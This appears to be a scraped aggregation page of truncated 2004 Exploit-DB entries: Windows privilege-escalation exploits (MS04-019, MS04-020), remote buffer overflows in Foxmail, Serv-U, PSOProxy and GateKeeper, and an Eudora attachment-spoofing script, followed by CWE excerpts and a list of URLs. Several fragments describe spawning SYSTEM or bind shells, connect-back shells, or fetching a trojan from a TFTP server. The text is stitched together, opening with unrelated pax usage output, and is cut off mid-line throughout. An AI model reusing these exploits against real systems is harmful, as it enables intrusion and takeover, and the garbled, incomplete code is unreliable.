By bkbll (bkbll#cnhonker.net,bkbll#tom.com) www.cnhonker.com
pax: illegal option--h
Usage: pax -[cimopuvy] [-f archive] [-s replstr] [-t device] [pattern.
pax -r [-cimopuvy] [-f archive] [-s replstr] [-t device] [patte
pax -w [-adimuvy] [-b blocking] [-f archive] [-s replstr]
[-t device] [-x format] [pathname...]
pax -r -w [-ilmopuvy] [
Exploit-DB
Microsoft Windows Server 2000 - Universal Language Utility Manager (MS04-019)
exploitdb·2004-07-17
CVE-2004-0213 Microsoft Windows Server 2000 - Universal Language Utility Manager (MS04-019)
Microsoft Windows Server 2000 - Universal Language Utility Manager (MS04-019)
---
/******************************************************************************************
****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4*****
** [Crpt] Utility Manager exploit v1.666 modified by kralor [Crpt] **
** It gets system language and sets windows names to work on any win2k :P **
** Feel free to add other languages :) **
** You know where we are.. **
*****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4****
******************************************************************************************/
/* original disclaimer */
//by Cesar Cerrudo sqlsec>at
#include
struct {
int id;
char *utilman;
char *winhelp;
char *open;
} lang[]
Exploit-DB
Microsoft Windows NT 4.0/2000 - POSIX Subsystem Local Buffer Overflow / Local Privilege Escalation (MS04-020)
exploitdb·2004-07-16
CVE-2004-0210 Microsoft Windows NT 4.0/2000 - POSIX Subsystem Local Buffer Overflow / Local Privilege Escalation (MS04-020)
Microsoft Windows NT 4.0/2000 - POSIX Subsystem Local Buffer Overflow / Local Privilege Escalation (MS04-020)
---
// source: https://www.securityfocus.com/bid/10710/info
The Microsoft POSIX subsystem implementation is prone to a local buffer overflow vulnerability.
A local attacker may exploit this vulnerability in order to run code with elevated privileges, fully compromising the vulnerable computer.
/* Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit (MS04-020)
*
* Tested on windows 2k sp4 CN,NT/XP/2003 NOT TESTED
*
* Posixexp.c By bkbll (bkbll cnhonker net,bkbll tom com) www cnhonker com
*
* 2004/07/16
*
* thanks to eyas xfocus org
*
*
C:\>whoami
VITUALWIN2K\test
C:\>posixexp
Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit(1
By bkbll (bkbll
Exploit-DB
Microsoft Windows Server 2000 - Utility Manager Privilege Escalation (MS04-019)
exploitdb·2004-07-14
CVE-2004-0213 Microsoft Windows Server 2000 - Utility Manager Privilege Escalation (MS04-019)
Microsoft Windows Server 2000 - Utility Manager Privilege Escalation (MS04-019)
---
//by Cesar Cerrudo sqlsec at yahoo.com
//Local elevation of priviliges exploit for Windows 2K Utility Manager (second one!!!!)
//Gives you a shell with system privileges
//If you have problems try changing Sleep() values.
#include "stdio.h"
#include "windows.h"
int main(int argc, char* argv[])
{
HWND lHandle, lHandle2;
POINT point;
char sText[]="%windir%\\system32\\cmd.ex?";
// run utility manager
// system("utilman.exe /start");
// Sleep(500);
lHandle=FindWindow(NULL, "Utility manager");
if (!lHandle) {
printf("\nUsage :\nPress Win Key+U to launch Utility Manager and then
run UtilManExploit2.exe\n");
return 0;
}
PostMessage(lHandle,0x313,NULL,NULL); //=right click on the app button
in the taskbar o
Exploit-DB
BT Voyager 2000 Wireless ADSL Router - SNMP Community String Information Disclosure
exploitdb·2004-06-22
CVE-2004-0616 BT Voyager 2000 Wireless ADSL Router - SNMP Community String Information Disclosure
BT Voyager 2000 Wireless ADSL Router - SNMP Community String Information Disclosure
---
source: https://www.securityfocus.com/bid/10589/info
BT Voyager 2000 Wireless ADSL Router is reported prone to a sensitive information disclosure vulnerability.
It is reported that 'public' SNMP MIB community strings which, are world readable by default contain sensitive information pertaining to the internal protected network.
Data collected by exploiting this vulnerability may be used in further attacks against the victim network.
root@abyrvalg:~# snmpwalk -v 1 -c public 192.168.1.1
SNMPv2-MIB::sysDescr.0 = STRING: BT Voyager 2000 Wireless ADSL Router
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.2535.111.6
SNMPv2-MIB::sysUpTime.0 = Timeticks: (260430184) 30 days, 1:02:01.84
[snip]
SN
Exploit-DB
Microsoft Windows XP/2000/NT 4.0 - Shell Long Share Name Buffer Overrun
exploitdb·2004-04-25
CVE-2004-0214 Microsoft Windows XP/2000/NT 4.0 - Shell Long Share Name Buffer Overrun
Microsoft Windows XP/2000/NT 4.0 - Shell Long Share Name Buffer Overrun
---
source: https://www.securityfocus.com/bid/10213/info
Microsoft Windows operating systems have been reported to be prone to a remotely exploitable buffer overrun condition.
This issue is exposed when a client attempts to connect to an SMB share with an overly long name. This may cause explorer.exe or Internet Explorer to crash but could also potentially be leveraged to execute arbitrary code as the client user.
[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Exploit-DB
Microsoft Windows XP/2000 - TCP Connection Reset
exploitdb·2004-04-22
CVE-2004-0230 Microsoft Windows XP/2000 - TCP Connection Reset
Microsoft Windows XP/2000 - TCP Connection Reset
---
{
AFX TCP Reset by Aphex
http://www.iamaphex.cjb.net
[email protected]
Compile with Delphi 5/6/7
}
program Project1;
{$APPTYPE CONSOLE}
uses
Windows;
type
TBufferArray = array[0..65535] of byte;
type
iph = record
ip_verlen: byte;
ip_tos: byte;
ip_len: word;
ip_id: word;
ip_offset: word;
ip_ttl: byte;
ip_protocol: byte;
ip_checksum: word;
ip_saddr: longword;
ip_daddr: longword;
end;
tcph = record
th_sport: word;
th_dport: word;
th_seq: longword;
th_ack: longword;
th_len: byte;
th_flags: byte;
th_win: word;
th_checksum: word;
th_upr: word;
end;
sb = packed record
sb1, sb2, sb3, sb4: char;
end;
sw = packed record
sw1, sw2: word;
end;
TInAddr = record
case integer of
0: (ssb: sb);
1: (ssw: sw);
2: (saddr: longint);
end;
TSock
Exploit-DB
Foxmail 5.0 - 'PunyLib.dll' Remote Stack Overflow
exploitdb·2004-03-23
CVE-2004-2719 Foxmail 5.0 - 'PunyLib.dll' Remote Stack Overflow
Foxmail 5.0 - 'PunyLib.dll' Remote Stack Overflow
---
/* fmx.c - x86/win32 Foxmail 5.0 PunyLib.dll remote stack buffer overflow exploit
*
* (C) COPYRIGHT XFOCUS Security Team, 2004
* All Rights Reserved
* -----------------------------------------------------------------------
* Author : xfocus
* : http://www.xfocus.org
* Maintain : XFOCUS Security Team
* Version : 0.2
*
* Test : Windows 2000 server GB/XP professional
* + Foxmail 5.0.300.0
* Notes : unpublished vul.
* Greets : all member of XFOCUS Security Team.
* Complie : cl fmx.c
* Usage : fmx
* mail_addr: email address we wantto hack
* tftp_server: run a tftp server and have a a.exe trojan
* smtp_server: SMTP server don't need login, we send the email thru it
*
* Date : 2004-02-27
* Revised : 2004-03-05
*
* Revise History:
* 2003-03-0
Exploit-DB
Proxy-Pro Professional GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow
exploitdb·2004-02-26
CVE-2004-0326 Proxy-Pro Professional GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow
Proxy-Pro Professional GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow
---
/*================[CRPT - FrenchTeam] =================*
[Coromputer Security Advisory] - [CRPTSA-01]
*=================== [Summary] =====================*
Software : GateKeeper Pro 4.7
Platforms : win32
Risk : High
Impact : Buffer overflow
Release Date : 2004-02-23
*=================== [Description] ====================*
there is a trivial buffer overflow in the web proxy (default port 3128).
*==================== [Details] ======================*
Sending GET http://host.com/AAAAAAAAAA...(~4100bytes) will cause an access
violation. Other services not tested, but they can be vulnerable too. Exact
version can be checked from the administration service (default port 2000).
*==================== [Exploits] =
Exploit-DB
PSOProxy 0.91 (Windows 2000/XP) - Remote Buffer Overflow
exploitdb·2004-02-26
CVE-2004-0313 PSOProxy 0.91 (Windows 2000/XP) - Remote Buffer Overflow
PSOProxy 0.91 (Windows 2000/XP) - Remote Buffer Overflow
---
/*
Copyright © Rosiello Security
http www rosiello org
-== Remote Exploit for PSOProxy version v0.91 ==--
Code by: rave
Contact: [email protected]
Date: Feb 2004
Bug found by: Donato Ferrante
There is a vulnerability found in the PSOProxy server.
An attacker can execute arbitrary code exploiting remotely a buffer overflow.
The exploit sends:
GET /
This spawns a bindshell on the victim at port 28876..
Usage psoproxy-exploit.exe
Target Number Target Name Stack Adress
============= =========== ===========
0 Demo 0xBADC0DED
1 Windows XP Home Edtion SP1. 0x00D2FDDA
2 Windows XP Pro Edtion SP1. 0x00EDFDDC
3 Win2k Pro Edtion. 0x00BBFDDC
psoproxy-exploit localhost 1
[+] Winsock Inalized
[+] Trying to connect to localhost:808
Exploit-DB
Caucho Technology Resin 2.1.12 - Directory Listings Disclosure
exploitdb·2004-02-09
CVE-2004-0281 Caucho Technology Resin 2.1.12 - Directory Listings Disclosure
Caucho Technology Resin 2.1.12 - Directory Listings Disclosure
---
source: https://www.securityfocus.com/bid/9617/info
It has been reported that Resin may be prone to an information disclosure vulnerability that may allow an attacker to disclose directory listings by passing malicious data via a URI parameter.
The issue has been reported to present itself on Windows NT/2000 systems running Apache 1.3.29 and Resin 2.1.12.
http://www.example.com/WEB-INF../
Exploit-DB
RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Remote Overflow
exploitdb·2004-01-27
CVE-2004-2111 RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Remote Overflow
RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Remote Overflow
---
/*
*
* Servu.c - Serv-U FTPD 3.x/4.x "SITE CHMOD" Command
* Remote stack buffer overflow exploit
*
* Copyright (C) 2004 HUC All Rights Reserved.
*
* Author : lion
* : [email protected]
* : http://www.cnhonker.com
* Date : 2004-01-25
* : 2004-01-25 v1.0 Can attack Serv-U v3.0.0.20~v4.1.0.11
* Tested : Windows 2000 Server EN/GB
* : + Serv-U v3.0.0.20~v4.1.0.11
* Notice : *** Bug find by kkqq [email protected] ***
* : *** You need a valid account and a writable directory. ***
* Complie : cl Servu.c
* Usage : Servu [-u user] [-p pass] [-d dir] [-f ftpport] [-c cbhost] [-s shellport]
*/
#include
#include
#include
#include
#pragma comment(lib, "ws2_32")
// for bind shellcode
#define BIND_OFFSET 91
// for connectback shell
Exploit-DB
Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass (2)
exploitdb·2003-11-25
CVE-2000-0342 Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass (2)
Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass (2)
---
source: https://www.securityfocus.com/bid/9101/info
A problem has been identified in the implementation of LaunchProtect within Eudora. Because of this, it may be possible to trick users into performing dangerous actions.
** May 21, 2004 - Eudora version 6.1.1 has been released, however, it is reported that the new versions is vulnerable to this issue as well.
#!/usr/bin/perl --
use MIME::Base64;
print "From: me\n";
print "To: you\n";
print "Subject: Eudora 6.1.1 on Windows spoof, LaunchProtect\n";
print "MIME-Version: 1.0\n";
print "Content-Type: multipart/mixed; boundary=\"zzz\"\n";
print "X-Use: Pipe the output of this script into: sendmail -i victim\n\n";
print "This is a multi-part message in MIME for
Exploit-DB
Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass (1)
exploitdb·2003-11-25
CVE-2000-0342 Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass (1)
Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass (1)
---
source: https://www.securityfocus.com/bid/9101/info
A problem has been identified in the implementation of LaunchProtect within Eudora. Because of this, it may be possible to trick users into performing dangerous actions.
** May 21, 2004 - Eudora version 6.1.1 has been released, however, it is reported that the new versions is vulnerable to this issue as well.
#!/usr/bin/perl --
use MIME::Base64;
print "From: me\n";
print "To: you\n";
print "Subject: Eudora 6.0.1 on Windows spoof, LaunchProtect\n";
print "\n";
print "Pipe the output of this script into: sendmail -i victim\n";
print "
Eudora 6.0.1 LaunchProtect handles the X-X.exe dichotomy in the attach
directory only, and allows spoofed attachments poin
CWE
Path Equivalence: 'filename.' (Trailing Dot)
mitre_cwe·CVSS 5.0
CVE-2000-1114 [MEDIUM] CWE-42 Path Equivalence: 'filename.' (Trailing Dot)
CWE-42: Path Equivalence: 'filename.' (Trailing Dot)
The product accepts path input in the form of trailing dot ('filedir.') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.
Modes of Introduction:
Phase: Implementation
Common Consequences:
Scope: Access Control. Impact: Bypass Protection Mechanism.
Observed Examples:
CVE-2000-1114: Source code disclosure using trailing dot
CVE-2002-1986: Source code disclosure using trailing dot
CVE-2004-2213: Source code disclosure using trailing dot
CVE-2005-3293: Source code disclosure using trailing dot
CVE-2004-0061: Bypass directory access restrictions using trailing dot in URL
CVE-2000-1133: Bypass directory access rest
CWE
Improper Handling of Missing Values
mitre_cwe·CVSS 5.0
[MEDIUM] CWE-230 Improper Handling of Missing Values
CWE-230: Improper Handling of Missing Values
The product does not handle or incorrectly handles when a parameter, field, or argument name is specified, but the associated value is missing, i.e. it is empty, blank, or null.
Modes of Introduction:
Phase: Implementation
Common Consequences:
Scope: Integrity. Impact: Unexpected State.
Examples:
This Android application has registered to handle a URL when sent an intent:
The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called.
Observed Examples:
CVE-2002-0422: Blank Host header triggers resultant infoleak.
CVE-2000-1006: Blank "charset" attribute in MIME header triggers crash.
CVE-2004-150
http://marc.info/?l=bugtraq&m=108378804809891&w=2http://osvdb.org/52223http://secunia.com/advisories/11553http://www.securityfocus.com/archive/1/488452/100/0/threadedhttp://www.securityfocus.com/bid/10282http://www.securityfocus.com/bid/27932http://www.waraxe.us/index.php?modname=sa&id=27https://exchange.xforce.ibmcloud.com/vulnerabilities/16074http://marc.info/?l=bugtraq&m=108378804809891&w=2http://osvdb.org/52223http://secunia.com/advisories/11553http://www.securityfocus.com/archive/1/488452/100/0/threadedhttp://www.securityfocus.com/bid/10282http://www.securityfocus.com/bid/27932http://www.waraxe.us/index.php?modname=sa&id=27https://exchange.xforce.ibmcloud.com/vulnerabilities/16074
2004-05-05
Published